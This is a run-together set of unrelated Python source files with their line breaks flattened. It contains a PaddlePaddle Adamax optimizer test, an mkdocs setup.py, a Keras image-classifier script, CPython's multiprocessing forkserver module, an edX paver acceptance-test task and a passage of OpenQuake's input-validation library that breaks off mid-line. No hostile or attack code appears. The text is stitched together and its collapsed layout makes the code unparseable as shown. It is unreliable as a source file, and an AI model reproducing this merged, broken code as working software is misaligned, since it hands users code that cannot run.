# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import unittest import numpy as np from op_test import OpTest import paddle import paddle.fluid as fluid class TestAdamaxAPI(unittest.TestCase): def test_adamax_api_dygraph(self): paddle.disable_static() value = np.arange(26).reshape(2, 13).astype("float32") a = paddle.to_tensor(value) linear = paddle.nn.Linear(13, 5) adam = paddle.optimizer.Adamax( learning_rate=0.01, parameters=linear.parameters(), weight_decay=0.01) out = linear(a) out.backward() adam.step() adam.clear_gradients() def test_adamax_api(self): place = fluid.CPUPlace() shape = [2, 3, 8, 8] exe = fluid.Executor(place) train_prog = fluid.Program() startup = fluid.Program() with fluid.program_guard(train_prog, startup): with fluid.unique_name.guard(): data = fluid.data(name="data", shape=shape) conv = fluid.layers.conv2d(data, 8, 3) loss = paddle.mean(conv) beta1 = 0.85 beta2 = 0.95 opt = paddle.optimizer.Adamax( learning_rate=1e-5, beta1=beta1, beta2=beta2, weight_decay=0.01, epsilon=1e-8) opt.minimize(loss) exe.run(startup) data_np = np.random.random(shape).astype('float32') rets = exe.run(train_prog, feed={"data": data_np}, fetch_list=[loss]) assert rets[0] is not None if __name__ == "__main__": unittest.main()
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import print_function from setuptools import setup import re import os import sys name = 'mkdocs' package = 'mkdocs' description = 'Project documentation with Markdown.' url = 'http://www.mkdocs.org' author = 'Tom Christie' author_email = '[email protected]' license = 'BSD' install_requires = [ 'Jinja2>=2.7.1', 'Markdown>=2.3.1,<2.5', 'PyYAML>=3.10', 'watchdog>=0.7.0', 'ghp-import>=0.4.1' ] long_description = ( "MkDocs is a fast, simple and downright gorgeous static site generator " "that's geared towards building project documentation. Documentation " "source files are written in Markdown, and configured with a single YAML " "configuration file." ) def get_version(package): """ Return package version as listed in `__version__` in `init.py`. """ init_py = open(os.path.join(package, '__init__.py')).read() return re.search("^__version__ = ['\"]([^'\"]+)['\"]", init_py, re.MULTILINE).group(1) def get_packages(package): """ Return root package and all sub-packages. """ return [dirpath for dirpath, dirnames, filenames in os.walk(package) if os.path.exists(os.path.join(dirpath, '__init__.py'))] def get_package_data(package): """ Return all files under the root package, that are not in a package themselves. """ walk = [(dirpath.replace(package + os.sep, '', 1), filenames) for dirpath, dirnames, filenames in os.walk(package) if not os.path.exists(os.path.join(dirpath, '__init__.py'))] filepaths = [] for base, filenames in walk: filepaths.extend([os.path.join(base, filename) for filename in filenames]) return {package: filepaths} if sys.argv[-1] == 'publish': os.system("python setup.py sdist upload") args = {'version': get_version(package)} print("You probably want to also tag the version now:") print(" git tag -a %(version)s -m 'version %(version)s'" % args) print(" git push --tags") sys.exit() setup( name=name, version=get_version(package), url=url, license=license, description=description, long_description=long_description, author=author, author_email=author_email, packages=get_packages(package), package_data=get_package_data(package), install_requires=install_requires, entry_points={ 'console_scripts': [ 'mkdocs = mkdocs.main:run_main', ], }, classifiers=[ 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Topic :: Documentation', 'Topic :: Text Processing', ] )
import sys sys.path.insert(0, "/input/") #for sys.path.insert(0, "../common/") #for local import common from keras.models import Sequential from keras.layers import * model = Sequential() model.add(SeparableConv2D(8, (7, 7), padding='same', input_shape=(common.resolution_x, common.resolution_y, 3))) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(4, 4))) model.add(SeparableConv2D(8, (5, 5), padding='same')) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(SeparableConv2D(8, (3, 3), padding='same')) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(SeparableConv2D(8, (3, 3), padding='same')) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(SeparableConv2D(8, (3, 3), padding='same')) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(SeparableConv2D(8, (3, 3), padding='same')) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(SeparableConv2D(8, (3, 3), padding='same')) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(BatchNormalization()) model.add(SeparableConv2D(8, (1, 1), padding='same')) model.add(Activation('relu')) model.add(Dropout(0.5)) model.add(GlobalAveragePooling2D()) model.add(Dropout(0.5)) model.add(Dense(16)) model.add(Activation('relu')) model.add(Dense(2)) model.add(Activation('softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) common.experiment(model)
import errno import os import selectors import signal import socket import struct import sys import threading import warnings from . import connection from . import process from .context import reduction from . import semaphore_tracker from . import spawn from . import util __all__ = ['ensure_running', 'get_inherited_fds', 'connect_to_new_process', 'set_forkserver_preload'] # # # MAXFDS_TO_SEND = 256 SIGNED_STRUCT = struct.Struct('q') # large enough for pid_t # # Forkserver class # class ForkServer(object): def __init__(self): self._forkserver_address = None self._forkserver_alive_fd = None self._forkserver_pid = None self._inherited_fds = None self._lock = threading.Lock() self._preload_modules = ['__main__'] def set_forkserver_preload(self, modules_names): '''Set list of module names to try to load in forkserver process.''' if not all(type(mod) is str for mod in self._preload_modules): raise TypeError('module_names must be a list of strings') self._preload_modules = modules_names def get_inherited_fds(self): '''Return list of fds inherited from parent process. This returns None if the current process was not started by fork server. ''' return self._inherited_fds def connect_to_new_process(self, fds): '''Request forkserver to create a child process. Returns a pair of fds (status_r, data_w). The calling process can read the child process's pid and (eventually) its returncode from status_r. The calling process should write to data_w the pickled preparation and process data. ''' self.ensure_running() if len(fds) + 4 >= MAXFDS_TO_SEND: raise ValueError('too many fds') with socket.socket(socket.AF_UNIX) as client: client.connect(self._forkserver_address) parent_r, child_w = os.pipe() child_r, parent_w = os.pipe() allfds = [child_r, child_w, self._forkserver_alive_fd, semaphore_tracker.getfd()] allfds += fds try: reduction.sendfds(client, allfds) return parent_r, parent_w except: os.close(parent_r) os.close(parent_w) raise finally: os.close(child_r) os.close(child_w) def ensure_running(self): '''Make sure that a fork server is running. This can be called from any process. Note that usually a child process will just reuse the forkserver started by its parent, so ensure_running() will do nothing. ''' with self._lock: semaphore_tracker.ensure_running() if self._forkserver_pid is not None: # forkserver was launched before, is it still running? pid, status = os.waitpid(self._forkserver_pid, os.WNOHANG) if not pid: # still alive return # dead, launch it again os.close(self._forkserver_alive_fd) self._forkserver_address = None self._forkserver_alive_fd = None self._forkserver_pid = None cmd = ('from multiprocessing.forkserver import main; ' + 'main(%d, %d, %r, **%r)') if self._preload_modules: desired_keys = {'main_path', 'sys_path'} data = spawn.get_preparation_data('ignore') data = {x: y for x, y in data.items() if x in desired_keys} else: data = {} with socket.socket(socket.AF_UNIX) as listener: address = connection.arbitrary_address('AF_UNIX') listener.bind(address) os.chmod(address, 0o600) listener.listen() # all client processes own the write end of the "alive" pipe; # when they all terminate the read end becomes ready. alive_r, alive_w = os.pipe() try: fds_to_pass = [listener.fileno(), alive_r] cmd %= (listener.fileno(), alive_r, self._preload_modules, data) exe = spawn.get_executable() args = [exe] + util._args_from_interpreter_flags() args += ['-c', cmd] pid = util.spawnv_passfds(exe, args, fds_to_pass) except: os.close(alive_w) raise finally: os.close(alive_r) self._forkserver_address = address self._forkserver_alive_fd = alive_w self._forkserver_pid = pid # # # def main(listener_fd, alive_r, preload, main_path=None, sys_path=None): '''Run forkserver.''' if preload: if '__main__' in preload and main_path is not None: process.current_process()._inheriting = True try: spawn.import_main_path(main_path) finally: del process.current_process()._inheriting for modname in preload: try: __import__(modname) except ImportError: pass util._close_stdin() sig_r, sig_w = os.pipe() os.set_blocking(sig_r, False) os.set_blocking(sig_w, False) def sigchld_handler(*_unused): # Dummy signal handler, doesn't do anything pass handlers = { # unblocking SIGCHLD allows the wakeup fd to notify our event loop signal.SIGCHLD: sigchld_handler, # protect the process from ^C signal.SIGINT: signal.SIG_IGN, } old_handlers = {sig: signal.signal(sig, val) for (sig, val) in handlers.items()} # calling os.write() in the Python signal handler is racy signal.set_wakeup_fd(sig_w) # map child pids to client fds pid_to_fd = {} with socket.socket(socket.AF_UNIX, fileno=listener_fd) as listener, \ selectors.DefaultSelector() as selector: _forkserver._forkserver_address = listener.getsockname() selector.register(listener, selectors.EVENT_READ) selector.register(alive_r, selectors.EVENT_READ) selector.register(sig_r, selectors.EVENT_READ) while True: try: while True: rfds = [key.fileobj for (key, events) in selector.select()] if rfds: break if alive_r in rfds: # EOF because no more client processes left assert os.read(alive_r, 1) == b'', "Not at EOF?" raise SystemExit if sig_r in rfds: # Got SIGCHLD os.read(sig_r, 65536) # exhaust while True: # Scan for child processes try: pid, sts = os.waitpid(-1, os.WNOHANG) except ChildProcessError: break if pid == 0: break child_w = pid_to_fd.pop(pid, None) if child_w is not None: if os.WIFSIGNALED(sts): returncode = -os.WTERMSIG(sts) else: if not os.WIFEXITED(sts): raise AssertionError( "Child {0:n} status is {1:n}".format( pid,sts)) returncode = os.WEXITSTATUS(sts) # Send exit code to client process try: write_signed(child_w, returncode) except BrokenPipeError: # client vanished pass os.close(child_w) else: # This shouldn't happen really warnings.warn('forkserver: waitpid returned ' 'unexpected pid %d' % pid) if listener in rfds: # Incoming fork request with listener.accept()[0] as s: # Receive fds from client fds = reduction.recvfds(s, MAXFDS_TO_SEND + 1) if len(fds) > MAXFDS_TO_SEND: raise RuntimeError( "Too many ({0:n}) fds to send".format( len(fds))) child_r, child_w, *fds = fds s.close() pid = os.fork() if pid == 0: # Child code = 1 try: listener.close() selector.close() unused_fds = [alive_r, child_w, sig_r, sig_w] unused_fds.extend(pid_to_fd.values()) code = _serve_one(child_r, fds, unused_fds, old_handlers) except Exception: sys.excepthook(*sys.exc_info()) sys.stderr.flush() finally: os._exit(code) else: # Send pid to client process try: write_signed(child_w, pid) except BrokenPipeError: # client vanished pass pid_to_fd[pid] = child_w os.close(child_r) for fd in fds: os.close(fd) except OSError as e: if e.errno != errno.ECONNABORTED: raise def _serve_one(child_r, fds, unused_fds, handlers): # close unnecessary stuff and reset signal handlers signal.set_wakeup_fd(-1) for sig, val in handlers.items(): signal.signal(sig, val) for fd in unused_fds: os.close(fd) (_forkserver._forkserver_alive_fd, semaphore_tracker._semaphore_tracker._fd, *_forkserver._inherited_fds) = fds # Run process object received over pipe code = spawn._main(child_r) return code # # Read and write signed numbers # def read_signed(fd): data = b'' length = SIGNED_STRUCT.size while len(data) < length: s = os.read(fd, length - len(data)) if not s: raise EOFError('unexpected EOF') data += s return SIGNED_STRUCT.unpack(data)[0] def write_signed(fd, n): msg = SIGNED_STRUCT.pack(n) while msg: nbytes = os.write(fd, msg) if nbytes == 0: raise RuntimeError('should not get here') msg = msg[nbytes:] # # # _forkserver = ForkServer() ensure_running = _forkserver.ensure_running get_inherited_fds = _forkserver.get_inherited_fds connect_to_new_process = _forkserver.connect_to_new_process set_forkserver_preload = _forkserver.set_forkserver_preload
""" Acceptance test tasks """ from paver.easy import cmdopts, needs from pavelib.utils.test.suites import AcceptanceTestSuite from pavelib.utils.passthrough_opts import PassthroughTask from optparse import make_option try: from pygments.console import colorize except ImportError: colorize = lambda color, text: text __test__ = False # do not collect @needs( 'pavelib.prereqs.install_prereqs', 'pavelib.utils.test.utils.clean_reports_dir', ) @cmdopts([ ("system=", "s", "System to act on"), ("default-store=", "m", "Default modulestore to use for course creation"), ("fasttest", "a", "Run without collectstatic"), make_option("--verbose", action="store_const", const=2, dest="verbosity"), make_option("-q", "--quiet", action="store_const", const=0, dest="verbosity"), make_option("-v", "--verbosity", action="count", dest="verbosity"), ("default_store=", None, "deprecated in favor of default-store"), ('extra_args=', 'e', 'deprecated, pass extra options directly in the paver commandline'), ]) @PassthroughTask def test_acceptance(options, passthrough_options): """ Run the acceptance tests for either lms or cms """ opts = { 'fasttest': getattr(options, 'fasttest', False), 'system': getattr(options, 'system', None), 'default_store': getattr(options, 'default_store', None), 'verbosity': getattr(options, 'verbosity', 3), 'extra_args': getattr(options, 'extra_args', ''), 'pdb': getattr(options, 'pdb', False), 'passthrough_options': passthrough_options, } if opts['system'] not in ['cms', 'lms']: msg = colorize( 'red', 'No system specified, running tests for both cms and lms.' ) print msg if opts['default_store'] not in ['draft', 'split']: msg = colorize( 'red', 'No modulestore specified, running tests for both draft and split.' ) print msg suite = AcceptanceTestSuite('{} acceptance'.format(opts['system']), **opts) suite.run()
# -*- coding: utf-8 -*- # vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright (c) 2013-2015, GEM Foundation # OpenQuake is free software: you can redistribute it and/or modify it # under the terms of the GNU Affero General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # OpenQuake is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU Affero General Public License # along with OpenQuake. If not, see <http://www.gnu.org/licenses/>. """ Validation library for the engine, the desktop tools, and anything else """ import re import ast import logging import textwrap import collections from decimal import Decimal import numpy from openquake.baselib.python3compat import with_metaclass from openquake.hazardlib import imt, scalerel, gsim from openquake.baselib.general import distinct SCALEREL = scalerel.get_available_magnitude_scalerel() GSIM = gsim.get_available_gsims() # more tests are in tests/valid_test.py def gsim(value, **kwargs): """ Make sure the given value is the name of an available GSIM class. >>> gsim('BooreAtkinson2011') 'BooreAtkinson2011()' """ try: gsim_class = GSIM[value] except KeyError: raise ValueError('Unknown GSIM: %s' % value) try: return gsim_class(**kwargs) except TypeError: raise ValueError('Could not instantiate %s%s' % (value, kwargs)) def compose(*validators): """ Implement composition of validators. For instance >>> utf8_not_empty = compose(utf8, not_empty) """ def composed_validator(value): out = value for validator in reversed(validators): out = validator(out) return out composed_validator.__name__ = 'compose(%s)' % ','.join( val.__name__ for val in validators) return composed_validator class NoneOr(object): """ Accept the empty string (casted to None) or something else validated by the underlying `cast` validator. """ def __init__(self, cast): self.cast = cast self.__name__ = cast.__name__ def __call__(self, value): if value: return self.cast(value) class Choice(object): """ Check if the choice is valid (case sensitive). """ @property def __name__(self): return 'Choice%s' % str(self.choices) def __init__(self, *choices): self.choices = choices def __call__(self, value): if value not in self.choices: raise ValueError('Got %r, expected %s' % ( value, '|'.join(self.choices))) return value class ChoiceCI(object): """ Check if the choice is valid (case insensitive version). """ def __init__(self, *choices): self.choices = choices self.__name__ = 'ChoiceCI%s' % str(choices) def __call__(self, value): value = value.lower() if value not in self.choices: raise ValueError('%r is not a valid choice in %s' % ( value, self.choices)) return value category = ChoiceCI('population', 'buildings') class Choices(Choice): """ Convert the choices, passed as a comma separated string, into a tuple of validated strings. For instance >>> Choices('xml', 'csv')('xml,csv') ('xml', 'csv') """ def __call__(self, value): values = value.lower().split(',') for val in values: if val not in self.choices: raise ValueError('%r is not a valid choice in %s' % ( val, self.choices)) return tuple(values) export_formats = Choices('', 'xml', 'csv', 'geojson') class Regex(object): """ Compare the value with the given regex """ def __init__(self, regex): self.rx = re.compile(regex) self.__name__ = 'Regex[%s]' % regex def __call__(self, value): if self.rx.match(value) is None: raise ValueError('%r does not match the regex %r' % (value, self.rx.pattern)) return value name = Regex(r'^[a-zA-Z_]\w*$') name_with_dashes = Regex(r'^[a-zA-Z_][\w\-]*$') MAX_ID_LENGTH = 100 def simple_id(value): """ Check the source id; the only accepted chars are `a-zA-Z0-9_-` """ if len(value) > MAX_ID_LENGTH: raise ValueError('The ID %r is longer than %d character' % (value, MAX_ID_LENGTH)) if re.match(r'^[\w_\-]+$', value): return value raise ValueError( 'Invalid ID %r: the only accepted chars are a-zA-Z0-9_-' % value) class FloatRange(object): def __init__(self, minrange, maxrange): self.minrange = minrange self.maxrange = maxrange self.__name__ = 'FloatRange[%s:%s]' % (minrange, maxrange) def __call__(self, value): f = float_(value) if f > self.maxrange: raise ValueError('%r is bigger than the max, %r' % (f, self.maxrange)) if f < self.minrange: raise ValueError('%r is smaller than the min, %r' % (f, self.minrange)) return f def not_empty(value): """Check that the string is not empty""" if value == '': raise ValueError('Got an empty string') return value def utf8(value): r""" Check that the string is UTF-8. Returns an encode bytestring. >>> utf8(b'\xe0') # doctest: +ELLIPSIS Traceback (most recent call last): ... ValueError: Not UTF-8: ... """ try: if isinstance(value, bytes): return value.decode('utf-8') else: return value except: raise ValueError('Not UTF-8: %r' % value) def utf8_not_empty(value): """Check that the string is UTF-8 and not empty""" return utf8(not_empty(value)) def namelist(value): """ :param value: input string :returns: list of identifiers separated by whitespace or commas >>> namelist('a,b') ['a', 'b'] >>> namelist('a1 b_2\t_c') ['a1', 'b_2', '_c'] >>> namelist('a1 b_2 1c') Traceback (most recent call last): ... ValueError: List of names containing an invalid name: 1c """ names = value.replace(',', ' ').split() for n in names: try: name(n) except ValueError: raise ValueError('List of names containing an invalid name:' ' %s' % n) return names def float_(value): """ :param value: input string :returns: a floating point number """ try: return float(value) except: raise ValueError('%r is not a float' % value) def nonzero(value): """ :param value: input string :returns: the value unchanged >>> nonzero('1') '1' >>> nonzero('0') Traceback (most recent call last): ... ValueError: '0' is zero """ if float_(value) == 0: raise ValueError('%r is zero' % value) return value def longitude(value): """ :param value: input string :returns: longitude float, rounded to 5 digits, i.e. 1 meter maximum >>> longitude('0.123456') 0.12346 """ lon = round(float_(value), 5) if lon > 180.: raise ValueError('longitude %s > 180' % lon) elif lon < -180.: raise ValueError('longitude %s < -180' % lon) return lon def latitude(value): """ :param value: input string :returns: latitude float, rounded to 5 digits, i.e. 1 meter maximum >>> latitude('-0.123456') -0.12346 """ lat = round(float_(value), 5) if lat > 90.: raise ValueError('latitude %s > 90' % lat) elif lat < -90.: raise ValueError('latitude %s < -90' % lat) return lat def depth(value): """ :param value: input string :returns: float >= 0 """ dep = float_(value) if dep < 0: raise ValueError('depth %s < 0' % dep) return dep def lon_lat(value): """ :param value: a pair of coordinates :returns: a tuple (longitude, latitude) >>> lon_lat('12 14') (12.0, 14.0) """ lon, lat = value.split() return longitude(lon), latitude(lat) def lon_lat_iml(value, lon, lat, iml): """ Used to convert nodes of the form <node lon="LON" lat="LAT" iml="IML" /> """ return longitude(lon), latitude(lat), positivefloat(iml) def coordinates(value): """ Convert a non-empty string into a list of lon-lat coordinates >>> coordinates('') Traceback (most recent call last): ... ValueError: Empty list of coordinates: '' >>> coordinates('1.1 1.2') [(1.1, 1.2)] >>> coordinates('1.1 1.2, 2.2 2.3') [(1.1, 1.2), (2.2, 2.3)] """ if not value.strip(): raise ValueError('Empty list of coordinates: %r' % value) return list(map(lon_lat, value.split(','))) def wkt_polygon(value): """ Convert a string with a comma separated list of coordinates into a WKT polygon, by closing the ring. """ points = ['%s %s' % lon_lat for lon_lat in coordinates(value)] # close the linear polygon ring by appending the first coord to the end points.append(points[0]) return 'POLYGON((%s))' % ', '.join(points) def positiveint(value): """ :param value: input string :returns: positive integer """ i = int(not_empty(value)) if i < 0: raise ValueError('integer %d < 0' % i) return i def positivefloat(value): """ :param value: input string :returns: positive float """ f = float(not_empty(value)) if f < 0: raise ValueError('float %s < 0' % f) return f def positivefloats(value): """ :param value: string of whitespace separated floats :returns: a list of positive floats """ return list(map(positivefloat, value.split())) _BOOL_DICT = { '': False, '0': False, '1': True, 'false': False, 'true': True, } def boolean(value): """ :param value: input string such as '0', '1', 'true', 'false' :returns: boolean >>> boolean('') False >>> boolean('True') True >>> boolean('false') False >>> boolean('t') Traceback (most recent call last): ... ValueError: Not a boolean: t """ value = value.strip().lower() try: return _BOOL_DICT[value] except KeyError: raise ValueError('Not a boolean: %s' % value) range01 = FloatRange(0, 1) probability = FloatRange(0, 1) probability.__name__ = 'probability' def probabilities(value): """ :param value: input string, comma separated or space separated :returns: a list of probabilities >>> probabilities('') [] >>> probabilities('1') [1.0] >>> probabilities('0.1 0.2') [0.1, 0.2] >>> probabilities('0.1, 0.2') # commas are ignored [0.1, 0.2] """ return list(map(probability, value.replace(',', ' ').split())) def decreasing_probabilities(value): """ :param value: input string, comma separated or space separated :returns: a list of decreasing probabilities >>> decreasing_probabilities('1') Traceback (most recent call last): ... ValueError: Not enough probabilities, found '1' >>> decreasing_probabilities('0.2 0.1') [0.2, 0.1] >>> decreasing_probabilities('0.1 0.2') Traceback (most recent call last): ... ValueError: The probabilities 0.1 0.2 are not in decreasing order """ probs = probabilities(value) if len(probs) < 2: raise ValueError('Not enough probabilities, found %r' % value) elif sorted(probs, reverse=True) != probs: raise ValueError('The probabilities %s are not in decreasing order' % value) return probs def IML(value, IMT, minIML=None, maxIML=None, imlUnit=None): """ Convert a node of the form <IML IMT="PGA" imlUnit="g" minIML="0.02" maxIML="1.5"/> into ("PGA", None, 0.02, 1.5) and a node <IML IMT="MMI" imlUnit="g">7 8 9 10 11</IML> into ("MMI", [7., 8., 9., 10., 11.], None, None) """ imt_str = str(imt.from_string(IMT)) if value: imls = positivefloats(value) check_levels(imls, imt_str) else: imls = None min_iml = positivefloat(minIML) if minIML else None max_iml = positivefloat(maxIML) if maxIML else None return (imt_str, imls, min_iml, max_iml, imlUnit) def fragilityparams(value, mean, stddev): """ Convert a node of the form <params mean="0.30" stddev="0.16" /> into a pair (0.30, 0.16) """ return positivefloat(mean), positivefloat(stddev) def intensity_measure_types(value): """ :param value: input string :returns: non-empty list of Intensity Measure Type objects >>> intensity_measure_types('PGA') ['PGA'] >>> intensity_measure_types('PGA, SA(1.00)') ['PGA', 'SA(1.0)'] >>> intensity_measure_types('SA(0.1), SA(0.10)') Traceback (most recent call last): ... ValueError: Duplicated IMTs in SA(0.1), SA(0.10) """ imts = [] for chunk in value.split(','): imts.append(str(imt.from_string(chunk.strip()))) if len(distinct(imts)) < len(imts): raise ValueError('Duplicated IMTs in %s' % value) return imts def check_levels(imls, imt): """ Raise a ValueError if the given levels are invalid. :param imls: a list of intensity measure and levels :param imt: the intensity measure type >>> check_levels([0.1, 0.2], 'PGA') # ok >>> check_levels([0.1], 'PGA') Traceback (most recent call last): ... ValueError: Not enough imls for PGA: [0.1] >>> check_levels([0.2, 0.1], 'PGA') Traceback (most recent call last): ... ValueError: The imls for PGA are not sorted: [0.2, 0.1] >>> check_levels([0.2, 0.2], 'PGA') Traceback (most recent call last): ... ValueError: Found duplicated levels for PGA: [0.2, 0.2] """ if len(imls) < 2: raise ValueError('Not enough imls for %s: %s' % (imt, imls)) elif imls != sorted(imls): raise ValueError('The imls for %s are not sorted: %s' % (imt, imls)) elif len(distinct(imls)) < len(imls): raise ValueError("Found duplicated levels for %s: %s" % (imt, imls)) def intensity_measure_types_and_levels(value): """ :param value: input string :returns: Intensity Measure Type and Levels dictionary >>> intensity_measure_types_and_levels('{"SA(0.10)": [0.1, 0.2]}') {'SA(0.1)': [0.1, 0.2]} """ dic = dictionary(value) for imt_str, imls in dic.items(): norm_imt = str(imt.from_string(imt_str)) if norm_imt != imt_str: dic[norm_imt] = imls del dic[imt_str] check_levels(imls, imt_str) # ValueError if the levels are invalid return dic def loss_ratios(value): """ :param value: input string :returns: dictionary loss_type -> loss ratios >>> loss_ratios('{"structural": [0.1, 0.2]}') {'structural': [0.1, 0.2]} """ dic = dictionary(value) for lt, ratios in dic.items(): for ratio in ratios: if not 0 <= ratio <= 1: raise ValueError('Loss ratio %f for loss_type %s is not in ' 'the range [0, 1]' % (ratio, lt)) check_levels(ratios, lt) # ValueError if the levels are invalid return dic def dictionary(value): """ :param value: input string corresponding to a literal Python object :returns: the Python object >>> dictionary('') {} >>> dictionary('{}') {} >>> dictionary('{"a": 1}') {'a': 1} >>> dictionary('"vs30_clustering: true"') # an error really done by a user Traceback (most recent call last): ... ValueError: '"vs30_clustering: true"' is not a valid Python dictionary """ if not value: return {} try: dic = dict(ast.literal_eval(value)) except: raise ValueError('%r is not a valid Python dictionary' % value) return dic # ########################### SOURCES/RUPTURES ############################# # def mag_scale_rel(value): """ :param value: name of a Magnitude-Scale relationship in hazardlib :returns: the corresponding hazardlib object """ value = value.strip() if value not in SCALEREL: raise ValueError('%r is not a recognized magnitude-scale ' 'relationship' % value) return value def pmf(value): """ Comvert a string into a Probability Mass Function. :param value: a sequence of probabilities summing up to 1 (no commas) :returns: a list of pairs [(probability, index), ...] with index starting from 0 >>> pmf("0.157 0.843") [(0.157, 0), (0.843, 1)] """ probs = probabilities(value) if sum(map(Decimal, value.split())) != 1: raise ValueError('The probabilities %s do not sum up to 1!' % value) return [(p, i) for i, p in enumerate(probs)] def check_weights(nodes_with_a_weight): """ Ensure that the sum of the values is 1 :param nodes_with_a_weight: a list of Node objects with a weight attribute """ weights = [n['weight'] for n in nodes_with_a_weight] if abs(sum(weights) - 1.) > 1E-12: raise ValueError('The weights do not sum up to 1!', weights) return nodes_with_a_weight def hypo_list(nodes): """ :param nodes: a hypoList node with N hypocenter nodes :returns: a numpy array of shape (N, 3) with strike, dip and weight """ check_weights(nodes) data = [] for node in nodes: data.append([node['alongStrike'], node['downDip'], node['weight']]) return numpy.array(data, float) def slip_list(nodes): """ :param nodes: a slipList node with N slip nodes :returns: a numpy array of shape (N, 2) with slip angle and weight """ check_weights(nodes) data = [] for node in nodes: data.append([slip_range(~node), node['weight']]) return numpy.array(data, float) def posList(value): """ :param value: a string with the form `lon1 lat1 [depth1] ... lonN latN [depthN]` without commas, where the depts are optional. :returns: a list of floats without other validations """ values = value.split() num_values = len(values) if num_values % 3 and num_values % 2: raise ValueError('Wrong number: nor pairs not triplets: %s' % values) try: return list(map(float_, values)) except Exception as exc: raise ValueError('Found a non-float in %s: %s' % (value, exc)) def point2d(value, lon, lat): """ This is used to convert nodes of the form <location lon="LON" lat="LAT" /> :param value: None :param lon: longitude string :param lat: latitude string :returns: a validated pair (lon, lat) """ return longitude(lon), latitude(lat) def point3d(value, lon, lat, depth): """ This is used to convert nodes of the form <hypocenter lon="LON" lat="LAT" depth="DEPTH"/> :param value: None :param lon: longitude string :param lat: latitude string :returns: a validated triple (lon, lat, depth) """ return longitude(lon), latitude(lat), positivefloat(depth) def probability_depth(value, probability, depth): """ This is used to convert nodes of the form <hypoDepth probability="PROB" depth="DEPTH" /> :param value: None :param probability: a probability :param depth: a depth :returns: a validated pair (probability, depth) """ return (range01(probability), positivefloat(depth)) strike_range = FloatRange(0, 360) slip_range = strike_range dip_range = FloatRange(0, 90) rake_range = FloatRange(-180, 180) def nodal_plane(value, probability, strike, dip, rake): """ This is used to convert nodes of the form <nodalPlane probability="0.3" strike="0.0" dip="90.0" rake="0.0" /> :param value: None :param probability: a probability :param strike: strike angle :param dip: dip parameter :param rake: rake angle :returns: a validated pair (probability, depth) """ return (range01(probability), strike_range(strike), dip_range(dip), rake_range(rake)) def ab_values(value): """ a and b values of the GR magniture-scaling relation. a is a positive float, b is just a float. """ a, b = value.split() return positivefloat(a), float_(b) # ############################## site model ################################ # vs30_type = ChoiceCI('measured', 'inferred') SiteParam = collections.namedtuple( 'SiteParam', 'z1pt0 z2pt5 measured vs30 lon lat backarc'.split()) def site_param(z1pt0, z2pt5, vs30Type, vs30, lon, lat, backarc="false"): """ Used to convert a node like <site lon="24.7125" lat="42.779167" vs30="462" vs30Type="inferred" z1pt0="100" z2pt5="5" backarc="False"/> into a 7-tuple (z1pt0, z2pt5, measured, vs30, backarc, lon, lat) """ return SiteParam(positivefloat(z1pt0), positivefloat(z2pt5), vs30_type(vs30Type) == 'measured', positivefloat(vs30), longitude(lon), latitude(lat), boolean(backarc)) ########################################################################### class Param(object): """ A descriptor for validated parameters with a default, to be used as attributes in ParamSet objects. :param validator: the validator :param default: the default value """ NODEFAULT = object() def __init__(self, validator, default=NODEFAULT, name=None): if not callable(validator): raise ValueError( '%r for %s is not a validator: it is not callable' % (validator, name)) if not hasattr(validator, '__name__'): raise ValueError( '%r for %s is not a validator: it has no __name__' % (validator, name)) self.validator = validator self.default = default self.name = name # set by ParamSet.__metaclass__ def __get__(self, obj, objclass): if obj is not None: if self.default is self.NODEFAULT: raise AttributeError(self.name) return self.default return self class MetaParamSet(type): """ Set the `.name` attribute of every Param instance defined inside any subclass of ParamSet. """ def __init__(cls, name, bases, dic): for name, val in dic.items(): if isinstance(val, Param): val.name = name # used in commonlib.oqvalidation class ParamSet(with_metaclass(MetaParamSet)): """ A set of valid interrelated parameters. Here is an example of usage: >>> class MyParams(ParamSet): ... a = Param(positiveint) ... b = Param(positivefloat) ... ... def is_valid_not_too_big(self): ... "The sum of a and b must be under 10. " ... return self.a + self.b < 10 >>> mp = MyParams(a='1', b='7.2') >>> mp <MyParams a=1, b=7.2> >>> MyParams(a='1', b='9.2').validate() Traceback (most recent call last): ... ValueError: The sum of a and b must be under 10. Got: a=1 b=9.2 The constrains are applied in lexicographic order. The attribute corresponding to a Param descriptor can be set as usual: >>> mp.a = '2' >>> mp.a '2' A list with the literal strings can be extracted as follows: >>> mp.to_params() [('a', "'2'"), ('b', '7.2')] It is possible to build a new object from a dictionary of parameters which are assumed to be already validated: >>> MyParams.from_(dict(a="'2'", b='7.2')) <MyParams a='2', b=7.2> """ params = {} @classmethod def from_(cls, dic): """ Build a new ParamSet from a dictionary of string-valued parameters which are assumed to be already valid. """ self = cls.__new__(cls) for k, v in dic.items(): setattr(self, k, 